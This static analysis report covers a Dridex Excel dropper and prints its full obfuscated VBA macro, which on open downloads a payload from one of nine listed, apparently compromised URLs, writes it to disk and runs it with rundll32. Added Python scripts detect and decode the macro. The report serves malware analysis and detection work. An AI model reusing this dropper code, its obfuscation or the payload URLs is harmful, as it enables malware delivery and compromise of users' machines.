Dridex — Office (OOXML) malware analysis

Static analysis result for SHA-256 aef7619253a8906e…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 70.6 KB
Created: 2021-04-28 14:20:21 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2021-05-22
MD5: 24fd1873f911783ca6954c8504b95112
SHA-1: 06c356a380b046cf9f97c329789abf887da811a6
SHA-256: aef7619253a8906e296c8122912bae7b828259bdd65ec2f3be3745194aa85d86
Risk score: 238

Malware Insights

Dridex · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer
T1566.001 Phishing: Spearphishing Attachment

The sample is an Excel workbook whose Workbook_Open macro runs as soon as the document is opened with macros enabled. Every string the macro needs (the COM ProgIDs, the HTTP verb, the name of the environment variable that selects the drop directory, the sheet and range that hold the download URLs, and the final command line) is assembled at runtime from junk-padded literals, Mid()/Replace() calls whose numeric arguments are arithmetic over Excel enum names, and values read from worksheet cells, so neither a ProgID nor a URL appears literally in the VBA. At runtime the macro walks a range of cells holding URLs (the nine listed under Embedded URL below), issues a synchronous HTTP request to each in turn, and on the first HTTP 200 response writes the response body to disk through an ADODB.Stream (SaveToFile with the overwrite option) under a directory taken from Environ(), executes it through the .Run method of a third dynamically created object, and stops iterating. The static fragments of the command builder (martialisms_geothermally_troph) decode to "rundll32.exe" followed by the quoted drop path, so the downloaded payload is a DLL launched through rundll32, which matches how the Dridex loader is typically started. The ClamAV detection name 'Xls.Downloader.DridexDarkGreen1020210-9905041-0' attributes the document to the Dridex family, and the critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' fires on the download, write and execute chain (.responseBody, SaveToFile, .Run) regardless of the obfuscated ProgIDs.

Heuristics 8

  • ClamAV: Xls.Downloader.DridexDarkGreen1020210-9905041-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.DridexDarkGreen1020210-9905041-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec entry point and the .Run/Shell execution path this is a download-and-execute dropper, even though the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    CUCKOLDOM_GURNS.Write .responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set HYPOXIAUNROOTED = CreateObject(MERCERY_HATCHEL_SINGLE)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TACNODESLOBOTOMIZESTEREOBATE = Environ(escrocsreportageformularisemut.PAWNAGES_LAZULIS_ARCTOPHILIES_(airbus_palpitant))
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://hdsecashpoint.com/hds/plugins/datatables/extensions/AutoFill/OG1XlESJf0.php (referenced by macro)
    • https://msmsecurityguards.com/static.wixstatic.com/media/cfa8e9_b80d5557ddd14fcfb79b6f7375e1e107_mv2.png/v1/fill/YWrZSo7OXzDJGy.php (referenced by macro)
    • https://lcd.cl/laravel/vendor/symfony/debug/Exception/FcuTrOHHiC.php (referenced by macro)
    • https://ultimasvagascompleto.com.br/wp-content/plugins/pretty-link/app/controllers/9xdo57R8588x0BE.php (referenced by macro)
    • https://apptownstore.com/public/adminpanal/bower_components/bootstrap-colorpicker/dist/FFHzimpdK4NcGa.php (referenced by macro)
    • https://www.bluhome.com.br/media/vendor/validation/test/additional/7ngcFscA4tK.php (referenced by macro)
    • https://alttitude-finance.com/wp-content/plugins/js_composer/vendor/mmihey/5qWkwHxc.php (referenced by macro)
    • https://couponoffer.app/vendor/symfony/var-dumper/Dumper/ContextProvider/80gsD0S1lwB.php (referenced by macro)
    • https://wthon.view.edu.in/fonts/flaticon/font/LHPldvNhLaLZT1W.php (referenced by macro)
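The two critical heuristics above (OLE_VBA_HTTP_DROP_EXEC and the p-code variant) key on what the macro does rather than on ProgID strings, which this sample never spells out. The following is an added example of that idea, not the analysis platform's own detector: it scans extracted VBA source line by line for an auto-exec entry point, consumption of an HTTP response body, a write to disk, an execution primitive and a CreateObject whose argument is not a string literal, and flags the sample when the full download, write and execute chain is present. The regexes, the function names and the benign comparison macro are mine; the malicious input is a constructed excerpt of the lines shown on this page.

```python
"""Behaviour-token triage for extracted VBA source (added example)."""
import re

# Each pattern names a behaviour, not a ProgID, so a dynamically built
# "MSXML2.XMLHTTP" or "WScript.Shell" string does not matter to the check.
BEHAVIOURS = {
    "autoexec": re.compile(r"\b(Workbook_Open|Auto_Open|Document_Open|AutoOpen|Workbook_Activate)\b", re.I),
    "http_body": re.compile(r"\.(responseBody|ResponseText|responseStream)\b", re.I),
    "disk_write": re.compile(r"\b(SaveToFile|Put\s+#|Open\s+.+\s+For\s+(Binary|Output))\b", re.I),
    "execute": re.compile(r"(\.Run\b|\bShell\s*\(|\.Exec\b|\bShellExecute\b|\.Create\b)", re.I),
    # CreateObject( followed by anything but a quote: the ProgID is computed at runtime.
    "dyn_createobject": re.compile(r"CreateObject\s*\(\s*[^\"')][^)]*\)", re.I),
}

# The chain that OLE_VBA_HTTP_DROP_EXEC describes: run on open, fetch, drop, execute.
REQUIRED = ("autoexec", "http_body", "disk_write", "execute")


def triage(vba_source):
    """Return the first line that exhibits each behaviour and a drop/exec verdict."""
    hits = {}
    for line in vba_source.splitlines():
        for name, pattern in BEHAVIOURS.items():
            if name not in hits and pattern.search(line):
                hits[name] = line.strip()
    return {"hits": hits, "drop_exec": set(REQUIRED).issubset(hits)}


# Constructed excerpt: lines copied from the macros.bas preview on this page.
SAMPLE = """Private Sub Workbook_Open()
IsDate (whingeshardtoptwankiesmonocrys.PLEIOMERIES_FELCHED(CHINOOK_VILLAINIZES_REINFORCE))
End Sub
    Set HYPOXIAUNROOTED = CreateObject(MERCERY_HATCHEL_SINGLE)
.Open striplingsoutbark.CYPROTERONE_UNLOOSED(rationalisingreshoweredfigwort), SASSOLITESTOMENTUMMENGES.Value, False
.Send
If .Status = CLng((507 + -307)) Then
CUCKOLDOM_GURNS.Write .responseBody
CUCKOLDOM_GURNS.SaveToFile outorganisedfashiousnessescult.TACNODESLOBOTOMIZESTEREOBATE() & apparatchiksplasterworksstabil.TUTIORISMTUTELAGESKYANITE(BELLYACHESBEDAZEBLATANCYLORAZE), CLng((-3.29489291598023E-03 * -607))
.Run POLYCARPICREQUITALSDECONDITION.ARENATIONS_TICKETLESS_PENDENTS
"""

# Constructed benign macro: auto-exec alone must not trip the verdict.
BENIGN = """Private Sub Workbook_Open()
    Worksheets("Summary").Range("A1").Value = Format(Now, "yyyy-mm-dd")
End Sub
"""

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE), ("benign", BENIGN)):
        result = triage(src)
        print(label, "drop_exec =", result["drop_exec"])
        for name, line in result["hits"].items():
            print("  %-16s %s" % (name, line[:80]))
```

Feed it the macros.bas that olevba writes; because the tokens are behavioural, a p-code-only document still trips it once the source is recovered, while a benign Workbook_Open that only touches cells does not.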

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10607 bytes
SHA-256: 7e73a76d60c12e555e76f9fa62f018e4dd17ea1282d3d6894c78d2c0e9e1b99f
Script preview (first 1,000 lines of the extracted source):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
IsDate (whingeshardtoptwankiesmonocrys.PLEIOMERIES_FELCHED(CHINOOK_VILLAINIZES_REINFORCE))
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "escrocsreportageformularisemut"
Function TURBINACIOUSLINEARIZINGFENESTR(LUBBERLINESSDIGLADIATORSUNSOAK)
PIPEWORTSPROJECTINGSJAGGS = Mid("!h^T#b.0/g:7EW", CLng((Not xlParamTypeWChar)), CLng((551 + -549)))
BESCRIBBLED_PALLORS_CHANNELLED = Mid("Xz-rLzK9s,3UOMSXMLRe5tv0auG+!", CLng((920 - 906)), CLng((xlCellValue Or xlPaperLedger)))
dwining_nihil_drainer = Worksheets("buoying_inte").Range("HI217")
disciplinarium_rufflike = Worksheets("QUERYHOMOSEX").Range("BZ219")
TURRICULATED_MITOCHONDRION_TRO = Worksheets("buoying_inte").Range("IG183")
TURBINACIOUSLINEARIZINGFENESTR = Join(Array(BESCRIBBLED_PALLORS_CHANNELLED & TURRICULATED_MITOCHONDRION_TRO & dwining_nihil_drainer & disciplinarium_rufflike & PIPEWORTSPROJECTINGSJAGGS))
End Function
Function PAWNAGES_LAZULIS_ARCTOPHILIES_(bunfights_mortarmen)
VOUDOUSDITTINGANOWALBUMENISED = Worksheets("halleluiah_g").Range("DB103")
UNWINKINGUNFOLDSLANTUNBUTTONED = Mid("2;|q#wObkw+P0vtaoFGwD@|v>1\", CLng((6.84931506849315E-02 * 219)), CLng((xlMixedLabels And xlErrorHandler)))
PAWNAGES_LAZULIS_ARCTOPHILIES_ = Join(Array(VOUDOUSDITTINGANOWALBUMENISED & Mid(":0iwas2_>o^ma.p6c4*;W^pG7q", CLng((124 - xlPyramidBarClustered)), CLng((Not xlParamTypeBinary))) & Worksheets("buoying_inte").Range("BX102") & UNWINKINGUNFOLDSLANTUNBUTTONED))
End Function

Attribute VB_Name = "striplingsoutbark"
Function CYPROTERONE_UNLOOSED(RUGGINGSBAFFLEDCENTRALIZERECHE)
ANCIENTRIES_VOZHDS = Replace("gR2h+gR2h+gR2h+gR2h+GgR2h+", "gR2h+", "")
PRECISIONISTS_BALLYHOOS_HEDGER = Worksheets("halleluiah_g").Range("FI104")
dinitrobenzenesamphiblasticlan = Replace("YL,LOYL,LOYL,LOYL,LO", "YL,LO", "")
DAKERED_LEEZE_CHELONES_DOGFOUG = Mid("hYg|k^*6be7(RT;TUgy", CLng((xlInsertEntireRows Or xlInsideHorizontal)), CLng((xlSortValues Or xlKatakanaHalf)))
CYPROTERONE_UNLOOSED = ANCIENTRIES_VOZHDS & PRECISIONISTS_BALLYHOOS_HEDGER & DAKERED_LEEZE_CHELONES_DOGFOUG & dinitrobenzenesamphiblasticlan
End Function
Function TOADLESSUNAPPREHENSIVEPLEADERS(timecardsankylosaurusesscoured)
wettishsironizing = Replace("PrLDQlVPrLDQlVPrLDQlVPrLDQlVV25", "PrLDQlV", "")
compurgations_cyanosed = Worksheets("halleluiah_g").Range("BT139")
TOADLESSUNAPPREHENSIVEPLEADERS = Join(Array(Worksheets("QUERYHOMOSEX").Range("BU175") & compurgations_cyanosed & Mid("TparF2PL D:#,Q+(N(uQT2", CLng((2.72277227722772E-02 * 404)), CLng((-721 + 722))) & Mid(":4>+I-g5TK)$Z.Ib27)wKn", CLng((-3.59712230215827E-02 * -417)), CLng((-2.31481481481481E-03 * -432))) & wettishsironizing & Replace("O=#NWsO=#NWs6O=#NWsO=#NWsO=#NWs", "O=#NWs", "") & Mid("1-mb|e5skf,.1^ALxq%q2vsgv*pf", CLng((618 - 604)), CLng((xlKatakanaHalf And xlNoRestrictions)))))
End Function

Attribute VB_Name = "apparatchiksplasterworksstabil"
Function TRAINBEARERSQUATTY(toolpushersrandsblaud)
slothfulnesses_resistibilities = Worksheets("QUERYHOMOSEX").Range("DK132")
TRAINBEARERSQUATTY = Join(Array(Worksheets("TSAREVICH_PS").Range("EV116") & Replace("IRh )VNIRh )VNIRh )VNIRh )VNIRh )VNB.S", "IRh )VN", "") & Worksheets("halleluiah_g").Range("BU66") & Mid("kiA7bream.L;K@^q16", CLng((Not xlTenMillions)), CLng((-9.47867298578199E-03 * -422))) & slothfulnesses_resistibilities))
End Function
Function MUDLARKING_VERNACULARISE_DISPR(sitophobias_gynodioecious)
UNSANCTIONEDZARATITEMACABRE = Worksheets("detortions_i").Range("IT232")
vernality_missal = Replace("+k#xO=r+k#xO=+k#xO=+k#xO=", "+k#xO=", "")
romanticized_chubascos_deinoth = Worksheets("detortions_i").Range("CX173")
swirlsensiblenessesdowdierrhab = Replace("J-@Y*;(J-@Y*;(J-@Y*;(J-@Y*;(ip", "J-@Y*;(", "")
piperinesouzelsmongrelisingdwa = Replace("02>FC02>FC02>FCe", "02>FC", "")
DEIFORMIDIOMORPHICALLYGYROVAGU = Replace("uYJT%xvuYJT%xvuYJT%xvWscuYJT%xvuYJT%xv", "uYJT%xv", "")
MUDLARKING_VERNACULARISE_DISPR = DEIFORMIDIOMORPHICALLYGYROVAGU & vernality_missal & swirlsensiblenessesdowdierrhab & UNSANCTIONEDZARATITEMACABRE & piperinesouzelsmongrelisingdwa & romanticized_chubascos_deinoth
End Function
Function martialisms_geothermally_troph(BERYLLIAS_OUVRIERES)
DESMODIUMSETCHCONNOTATIONALENF = Replace("rundUv#6YgUv#6YgUv#6Yg", "Uv#6Yg", "")
martialisms_geothermally_troph = Join(Array(DESMODIUMSETCHCONNOTATIONALENF & Mid("FQx^8kll32.ejS0S>t", CLng((xlDialogPivotFieldUngroup + -427)), CLng((xlDisabled Xor xlCSV))) & Mid(" m9Q77seYhcxeEiurJ", CLng((-0.051948051948052 * -231)), CLng((-2.53485424588086E-03 * -789)))))
End Function
Function pollenatecircumstantialityviol(LEPROSARIA_ENWREATHED_IMPARADI)
dilliesmwah = Worksheets("TSAREVICH_PS").Range("GS144")
PLEONASTICALLY_MADOQUAS = Worksheets("QUERYHOMOSEX").Range("EN165")
TORTOISESHELLS_HONDLING_WIKIS_ = Worksheets("buoying_inte").Range("CM70")
pollenatecircumstantialityviol = Join(Array(dilliesmwah & PLEONASTICALLY_MADOQUAS & TORTOISESHELLS_HONDLING_WIKIS_))
End Function
Function TUTIORISMTUTELAGESKYANITE(qualityduffelclairaudientslyse)
zinckifications_midwinters_lib = Mid("(%yx\tsAGj\2311l$eYN.UJG6y", CLng((-319 + xlDialogVbaProcedureDefinition)), CLng((Not xlParamTypeTinyInt)))
RADIALISESGANTPUDDLING = Replace(";/4xvRt9..d;/4xvRt;/4xvRt;/4xvRt", ";/4xvRt", "")
SCATTERINGSTOVINGS = Replace(",P*K1f;,P*K1f;,P*K1f;l", ",P*K1f;", "")
TUTIORISMTUTELAGESKYANITE = Join(Array(zinckifications_midwinters_lib & RADIALISESGANTPUDDLING & SCATTERINGSTOVINGS & Worksheets("TSAREVICH_PS").Range("IB107")))
End Function
Function PREPREGSVETOUPFURLINGMICROMANA(jackrolllukewarmlyupraises)
SYCOPHANTRIES_SUBADARS = Worksheets("buoying_inte").Range("EC231")
DIVULGATER_BUDGERS_VINERIES_AB = Mid("!mglb-ne;RYHOM,&GEq@6r|!v;(M", CLng((Not -11)), CLng((Not xlParamTypeTinyInt)))
PREPREGSVETOUPFURLINGMICROMANA = Worksheets("TSAREVICH_PS").Range("GC119") & DIVULGATER_BUDGERS_VINERIES_AB & Replace("dh-1FEdh-1FEdh-1FEO", "dh-1FE", "") & Replace("HYKDPSEXHYKDPHYKDP", "HYKDP", "") & SYCOPHANTRIES_SUBADARS
End Function

Attribute VB_Name = "outorganisedfashiousnessescult"
Function TACNODESLOBOTOMIZESTEREOBATE()
TACNODESLOBOTOMIZESTEREOBATE = Environ(escrocsreportageformularisemut.PAWNAGES_LAZULIS_ARCTOPHILIES_(airbus_palpitant))
End Function

Attribute VB_Name = "POLYCARPICREQUITALSDECONDITION"
Function ARENATIONS_TICKETLESS_PENDENTS()
    ARENATIONS_TICKETLESS_PENDENTS = apparatchiksplasterworksstabil.martialisms_geothermally_troph(sterilisingimmotile) & Chr(CLng((-739 - -771))) & Chr(CLng((xlConstants Or xlWQ1))) & outorganisedfashiousnessescult.TACNODESLOBOTOMIZESTEREOBATE() & apparatchiksplasterworksstabil.TUTIORISMTUTELAGESKYANITE(BELLYACHESBEDAZEBLATANCYLORAZE) & Chr(CLng((Not -35))) & " " & apparatchiksplasterworksstabil.pollenatecircumstantialityviol(UNSOPHISTICATION_HERALDS_ABHOR)
End Function

Attribute VB_Name = "medicined_cooperating"
Function HYPOXIAUNROOTED(MERCERY_HATCHEL_SINGLE)
    Set HYPOXIAUNROOTED = CreateObject(MERCERY_HATCHEL_SINGLE)
End Function

Attribute VB_Name = "whingeshardtoptwankiesmonocrys"
Function PLEIOMERIES_FELCHED(trimetersunpropheticalcodrivel)
Set CUCKOLDOM_GURNS = medicined_cooperating.HYPOXIAUNROOTED(apparatchiksplasterworksstabil.TRAINBEARERSQUATTY(MALIST_ARRESTERS_TANTIVY_SCOWL))
Set rooftrees_despitefully_variedn = medicined_cooperating.HYPOXIAUNROOTED(escrocsreportageformularisemut.TURBINACIOUSLINEARIZINGFENESTR(ARMORIALSIRONCLADSROENTGENOGRA))
Set mishegaasen_sjamboks = medicined_cooperating.HYPOXIAUNROOTED(apparatchiksplasterworksstabil.MUDLARKING_VERNACULARISE_DISPR(BOYO_HEPATOSCOPIES_INDULGES))
For Each SASSOLITESTOMENTUMMENGES In Worksheets(apparatchiksplasterworksstabil.PREPREGSVETOUPFURLINGMICROMANA(OVERSTAYHYSSOPSOPPRESSIVEZAMPO)).Range(striplingsoutbark.TOADLESSUNAPPREHENSIVEPLEADERS(verbalize_countesses_resettle_))
If Len(SASSOLITESTOMENTUMMENGES.Value) > CLng((-228 + 231)) Then
With rooftrees_despitefully_variedn
.Open striplingsoutbark.CYPROTERONE_UNLOOSED(rationalisingreshoweredfigwort), SASSOLITESTOMENTUMMENGES.Value, False
.Send
If .Status = CLng((507 + -307)) Then
CUCKOLDOM_GURNS.Open
HvjI8p = Abs(CLng((1960 + -556)))
CUCKOLDOM_GURNS.Type = CLng((-573 - -574))
jpS0c0_6DRMA = Abs(CLng((3297 Or 2093)))
CUCKOLDOM_GURNS.Write .responseBody
QBrx0S = CLng((0.127238454288407 * 1061)) < CLng((xlDialogFormatOverlay Or xlDialogFormulaReplace))
CUCKOLDOM_GURNS.SaveToFile outorganisedfashiousnessescult.TACNODESLOBOTOMIZESTEREOBATE() & apparatchiksplasterworksstabil.TUTIORISMTUTELAGESKYANITE(BELLYACHESBEDAZEBLATANCYLORAZE), CLng((-3.29489291598023E-03 * -607))
CUCKOLDOM_GURNS.Close
With mishegaasen_sjamboks
.Run POLYCARPICREQUITALSDECONDITION.ARENATIONS_TICKETLESS_PENDENTS
End With
Exit For
End If
End With
End If
UNEXCELLED_BESCORCHES:
Next SASSOLITESTOMENTUMMENGES
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 54272 bytes
SHA-256: f313e5c50f2cbdc747fa620082db197e0566559b08c3c022d86d5c5f2d1c5a28
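The builder functions in the extracted script hide every meaningful string behind Mid()/Replace() over junk literals, arithmetic on Excel enum names, and worksheet cell reads. The script below is an added example of decoding those fragments statically; it is not code from the sample or from the analysis platform. It re-implements the VBA primitives the macro relies on (Mid, Replace, Chr, Not, CLng) over a table of Excel object-model constants, and evaluates each builder with the cell reads left as "{sheet!address}" placeholders (a notation of mine). That is enough to recover the "MSXML" prefix and ".0" suffix of the HTTP object's ProgID, the "G...T" skeleton of the verb, the "rundll32.exe" launcher, the "RYHOMOSEX" core of the sheet name the loop walks, the ":IV256" end of its range, and the numeric literals (200, 1, 2, 3) hidden as arithmetic. Resolving the placeholders requires reading the workbook's cells, which this script does not do.

```python
"""Static decode of the string-building tricks in the extracted macro (added example)."""

# Excel object-model enum values referenced by the macro.
XL = {
    "xlParamTypeWChar": -8, "xlParamTypeBinary": -2, "xlParamTypeTinyInt": -6,
    "xlCellValue": 1, "xlPaperLedger": 4, "xlInsertEntireRows": 2,
    "xlInsideHorizontal": 12, "xlSortValues": 1, "xlKatakanaHalf": 0,
    "xlNoRestrictions": 0, "xlPyramidBarClustered": 109, "xlMixedLabels": 3,
    "xlErrorHandler": 2, "xlDialogPivotFieldUngroup": 434, "xlDisabled": 0,
    "xlCSV": 6, "xlConstants": 2, "xlWQ1": 34,
}


def clng(x):
    """VBA CLng(): rounds half to even, which Python's round() also does."""
    return int(round(x))


def vb_not(n):
    """VBA Not on a Long is a bitwise complement: Not -8 = 7, Not -11 = 10."""
    return ~n


def mid(s, start, length):
    """VBA Mid() is 1-based: Mid(s, 7, 2) returns characters 7 and 8."""
    return s[start - 1:start - 1 + length]


def strip(s, junk):
    """Replace(s, junk, ""): the real text is whatever survives the removal."""
    return s.replace(junk, "")


def cell(sheet, addr):
    """Placeholder for Worksheets(sheet).Range(addr); only the workbook can resolve it."""
    return "{%s!%s}" % (sheet, addr)


def decode():
    """Evaluate each obfuscated builder of the macro, cell reads excepted."""
    f = {}
    # TURBINACIOUSLINEARIZINGFENESTR: ProgID of the object that receives .Open/.Send/.Status
    f["http_progid"] = (
        mid("Xz-rLzK9s,3UOMSXMLRe5tv0auG+!", clng(920 - 906), clng(XL["xlCellValue"] | XL["xlPaperLedger"]))
        + cell("buoying_inte", "IG183") + cell("buoying_inte", "HI217") + cell("QUERYHOMOSEX", "BZ219")
        + mid("!h^T#b.0/g:7EW", clng(vb_not(XL["xlParamTypeWChar"])), clng(551 + -549)))
    # CYPROTERONE_UNLOOSED: HTTP verb passed to .Open
    f["verb"] = (
        strip("gR2h+gR2h+gR2h+gR2h+GgR2h+", "gR2h+") + cell("halleluiah_g", "FI104")
        + mid("hYg|k^*6be7(RT;TUgy", clng(XL["xlInsertEntireRows"] | XL["xlInsideHorizontal"]),
              clng(XL["xlSortValues"] | XL["xlKatakanaHalf"]))
        + strip("YL,LOYL,LOYL,LOYL,LO", "YL,LO"))
    # PAWNAGES_LAZULIS_ARCTOPHILIES_: variable name handed to Environ() for the drop directory
    f["env_var"] = (
        cell("halleluiah_g", "DB103")
        + mid(":0iwas2_>o^ma.p6c4*;W^pG7q", clng(124 - XL["xlPyramidBarClustered"]), clng(vb_not(XL["xlParamTypeBinary"])))
        + cell("buoying_inte", "BX102")
        + mid("2;|q#wObkw+P0vtaoFGwD@|v>1\\", clng(6.84931506849315E-02 * 219), clng(XL["xlMixedLabels"] & XL["xlErrorHandler"])))
    # martialisms_geothermally_troph: first token of the command line given to .Run
    f["launcher"] = (
        strip("rundUv#6YgUv#6YgUv#6Yg", "Uv#6Yg")
        + mid("FQx^8kll32.ejS0S>t", clng(XL["xlDialogPivotFieldUngroup"] + -427), clng(XL["xlDisabled"] ^ XL["xlCSV"]))
        + mid(" m9Q77seYhcxeEiurJ", clng(-0.051948051948052 * -231), clng(-2.53485424588086E-03 * -789)))
    # PREPREGSVETOUPFURLINGMICROMANA: sheet the For Each loop walks for URLs
    f["url_sheet"] = (
        cell("TSAREVICH_PS", "GC119")
        + mid("!mglb-ne;RYHOM,&GEq@6r|!v;(M", clng(vb_not(-11)), clng(vb_not(XL["xlParamTypeTinyInt"])))
        + strip("dh-1FEdh-1FEdh-1FEO", "dh-1FE") + strip("HYKDPSEXHYKDPHYKDP", "HYKDP")
        + cell("buoying_inte", "EC231"))
    # TOADLESSUNAPPREHENSIVEPLEADERS: range on that sheet holding the URL list
    f["url_range"] = (
        cell("QUERYHOMOSEX", "BU175") + cell("halleluiah_g", "BT139")
        + mid("TparF2PL D:#,Q+(N(uQT2", clng(2.72277227722772E-02 * 404), clng(-721 + 722))
        + mid(":4>+I-g5TK)$Z.Ib27)wKn", clng(-3.59712230215827E-02 * -417), clng(-2.31481481481481E-03 * -432))
        + strip("PrLDQlVPrLDQlVPrLDQlVPrLDQlVV25", "PrLDQlV")
        + strip("O=#NWsO=#NWs6O=#NWsO=#NWsO=#NWs", "O=#NWs")
        + mid("1-mb|e5skf,.1^ALxq%q2vsgv*pf", clng(618 - 604), clng(XL["xlKatakanaHalf"] & XL["xlNoRestrictions"])))
    # ARENATIONS_TICKETLESS_PENDENTS: launcher, Chr(32), Chr(34), drop path, Chr(34), space, arguments.
    # The drop path and the arguments come from cell-fed builders, left as placeholders here.
    space, quote = chr(clng(-739 - -771)), chr(clng(XL["xlConstants"] | XL["xlWQ1"]))
    f["command"] = (f["launcher"] + space + quote + "{Environ(env_var)}{TUTIORISMTUTELAGESKYANITE()}"
                    + chr(vb_not(-35)) + " " + "{pollenatecircumstantialityviol()}")
    # Numeric literals hidden as arithmetic in PLEIOMERIES_FELCHED
    f["status_ok"] = clng(507 + -307)                       # .Status compared against this
    f["stream_type"] = clng(-573 - -574)                     # ADODB.Stream .Type 1 = adTypeBinary
    f["save_option"] = clng(-3.29489291598023E-03 * -607)    # SaveToFile 2 = adSaveCreateOverWrite
    f["min_cell_len"] = clng(-228 + 231)                     # Len(cell.Value) must exceed this
    return f


if __name__ == "__main__":
    for name, value in decode().items():
        print("%-13s %s" % (name, value))
```

To finish the decode, open the workbook with openpyxl (load_workbook(path, data_only=True)) and substitute the referenced cell values for the placeholders; the cells live on the sheets named in the script (buoying_inte, QUERYHOMOSEX, halleluiah_g, TSAREVICH_PS, detortions_i), which is also where the nine URLs are stored. Keep the Excel constant table as the one assumption to double-check: a wrong enum value shifts a Mid() start index and silently changes the recovered text.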